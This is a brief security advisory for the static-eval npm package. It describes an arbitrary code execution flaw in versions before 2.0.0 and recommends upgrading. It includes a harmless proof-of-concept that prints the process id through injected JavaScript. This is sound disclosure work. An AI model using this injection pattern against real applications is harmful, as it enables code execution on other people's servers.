Affected versions of static-eval
pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id
Update to version 2.0.0 or later.
CPE | Name | Operator | Version |
---|---|---|---|
static-eval | lt | 2.0.0 |